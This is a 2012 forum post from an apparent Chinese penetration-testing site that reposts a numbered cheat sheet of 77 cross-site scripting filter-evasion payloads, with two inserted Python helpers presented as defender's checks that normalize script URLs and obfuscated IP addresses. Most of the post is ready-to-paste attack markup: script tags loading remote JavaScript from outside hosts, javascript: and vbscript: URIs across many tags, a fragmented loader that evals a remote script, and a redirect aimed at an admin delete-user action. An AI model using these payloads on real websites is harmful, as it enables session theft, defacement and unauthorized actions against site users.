中国网络渗透测试联盟

Title: XSS cross-site scripting attack roundup

Author: admin    Time: 2012-9-5 14:56
Title: XSS cross-site scripting attack roundup
There doesn't seem to be much XSS material on t00ls, so when I saw this good stuff I copied it over; not sure whether any of you want to bookmark it.
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (the semicolons are required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hexadecimal encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically useless domestically, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC="   javascript:alert('XSS');">
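As an added defender's check (not part of the original post): a normalizer that decodes an attribute URL the way a browser does before it reads the scheme, so that the case, entity-encoding, embedded-control-character and leading-space tricks of items 3 to 19 above all collapse to the same `javascript:` prefix. `naive_filter` is the literal substring match those items defeat; the sample values are constructed from the items, and the set of ignored code points is an assumption chosen to be conservative.

```python
import html

# Code points browsers (older IE included) have ignored inside a URL scheme:
# C0 controls, NUL and space (items 11-19) plus the non-ASCII spaces and BOM
# listed in item 47. Assumed set; deliberately conservative, so it yields
# false positives rather than false negatives.
IGNORED_CODEPOINTS = (set(range(0x00, 0x21)) | {0x7F, 0xA0, 0x3000, 0xFEFF}
                      | set(range(0x2000, 0x200C)))
SCRIPT_SCHEMES = ("javascript:", "vbscript:")

def naive_filter(value: str) -> bool:
    """The literal check the items above defeat: is 'javascript:' spelled out?"""
    return "javascript:" in value

def normalize_attr_url(value: str) -> str:
    """Decode an attribute value the way a browser does before reading its scheme."""
    # 1. HTML character references; html.unescape follows HTML5 and therefore
    #    also accepts numeric references with no trailing semicolon (items 9, 10)
    decoded = html.unescape(value)
    # 2. drop the characters a browser ignores around and inside the scheme
    stripped = "".join(ch for ch in decoded if ord(ch) not in IGNORED_CODEPOINTS)
    # 3. scheme matching is case-insensitive (item 4)
    return stripped.lower()

def is_script_url(value: str) -> bool:
    """True when the value would run script if placed in SRC/HREF/BACKGROUND."""
    return normalize_attr_url(value).startswith(SCRIPT_SCHEMES)

def hex_refs(text: str) -> str:
    """Encode every character as &#xHH with no semicolon, as in item 10."""
    return "".join("&#x%X" % ord(ch) for ch in text)

def dec_refs(text: str) -> str:
    """Encode every character as &#NNN; with semicolons, as in item 5."""
    return "".join("&#%d;" % ord(ch) for ch in text)

PAYLOAD = "javascript:alert('XSS')"
# Constructed sample attribute values, one per evasion trick from the list
SAMPLES = {
    "plain": PAYLOAD,
    "mixed case (4)": "JaVaScRiPt:alert('XSS')",
    "decimal entities (5)": dec_refs(PAYLOAD),
    "hex entities, no semicolons (10)": hex_refs(PAYLOAD),
    "embedded tab (11)": "jav\tascript:alert('XSS')",
    "encoded newline (13)": "jav&#x0A;ascript:alert('XSS')",
    "null byte (17)": "java\0script:alert('XSS')",
    "leading spaces (19)": "   javascript:alert('XSS')",
    "benign": "https://example.com/page",
}

def missed_by_naive_filter() -> list:
    """Names of samples that run script yet slip past the literal substring check."""
    return [name for name, value in SAMPLES.items()
            if is_script_url(value) and not naive_filter(value)]
```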
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) End TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with a link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
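Items 70 to 73 hide the same host behind the legacy inet_aton number spellings (one decimal number, hex parts, octal parts, or a mix). As an added defender's helper (not from the original post), this canonicalizes such hosts to a dotted quad so an allow/deny list or a log search compares the real address rather than its spelling; the sample links are the ones from items 70 to 73 and 76, with the whitespace of item 73 removed.

```python
from urllib.parse import urlsplit

def parse_legacy_ipv4(host: str):
    """Canonical dotted quad for the inet_aton spellings in items 70-73, else None.

    Each dot-separated part may be hexadecimal (0x..), octal (leading 0) or
    decimal; the last part fills all remaining bytes, so a lone number is the
    whole 32-bit address (item 70).
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(p.isalnum() for p in parts):
        return None
    nums = []
    for part in parts:
        try:
            if part[:2].lower() == "0x":
                num = int(part[2:], 16) if len(part) > 2 else 0
            elif len(part) > 1 and part[0] == "0":
                num = int(part, 8)
            else:
                num = int(part, 10)
        except ValueError:
            return None
        nums.append(num)
    # every part but the last is one byte; the last fills the rest
    tail_bytes = 5 - len(nums)
    if any(n > 255 for n in nums[:-1]) or nums[-1] >= 256 ** tail_bytes:
        return None
    value = 0
    for num in nums[:-1]:
        value = (value << 8) | num
    value = (value << (8 * tail_bytes)) | nums[-1]
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def canonical_host(url: str) -> str:
    """Hostname of url with any legacy IPv4 spelling rewritten; names pass through."""
    host = urlsplit(url).hostname or ""
    return parse_legacy_ipv4(host) or host

# Constructed sample links built from items 70-73 and 76 above
SAMPLE_LINKS = [
    "http://3232235521/",
    "http://0xc0.0xa8.0x00.0x01/",
    "http://0300.0250.0000.0001/",
    "http://66.000146.0x7.147/",
    "http://www.google.com./",
]
```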
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2